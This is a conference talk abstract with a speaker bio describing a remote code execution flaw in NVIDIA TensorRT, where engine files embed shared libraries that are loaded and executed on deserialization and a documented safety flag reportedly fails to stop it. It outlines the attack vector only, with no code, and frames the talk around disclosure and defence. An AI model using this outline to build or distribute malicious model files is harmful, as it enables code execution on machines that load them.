28KB to Root: Weaponizing NVIDIA's AI Model Files for Native RCE
Security Researcher @ Scapia

Talk Abstract
NVIDIA TensorRT is the go to inference runtime for production AI if a model is running fast on a GPU somewhere, TensorRT is probably involved. It compiles neural networks into optimized `.engine` files that get passed around like any other model artifact: uploaded to HuggingFace, shared between teams, pulled into deployment pipelines. Nobody thinks twice about loading one.
They should.
TensorRT engine files embed real shared libraries. When you call `deserializeCudaEngine()`, NVIDIA's runtime extracts them to `/tmp` and blindly calls `dlopen()` running whatever constructor code is inside. That's it. That's the bug.
The only documented safety flag, `engine_host_code_allowed=False`, does nothing. It guards a different code path entirely. A 28KB engine file is all it takes to get a shell, and it works on the latest TensorRT release.
This talk walks through the full attack chain from crafting the malicious engine to popping a shell on the victim process then pulls back to the bigger picture: TensorRT isn't alone. PyTorch, ONNX, Keras AI model files across the board carry executable code that no one is treating as a threat. We'll cover how to detect it, how to defend against it, and what vendors need to fix.
If your team downloads AI models from anywhere and loads them, this talk is for you.About the Speaker

Arun Krishnan
Security Researcher @ Scapia
Arun Krishnan is a fourth-year B.Tech student at Amrita Vishwa Vidyapeetham. He has been playing CTFs with Team bi0s for the past 4 years. His interests lie in web and AI security research. He has discovered dozens of zero-day vulnerabilities across major open-source software and has 4 CVEs to his name.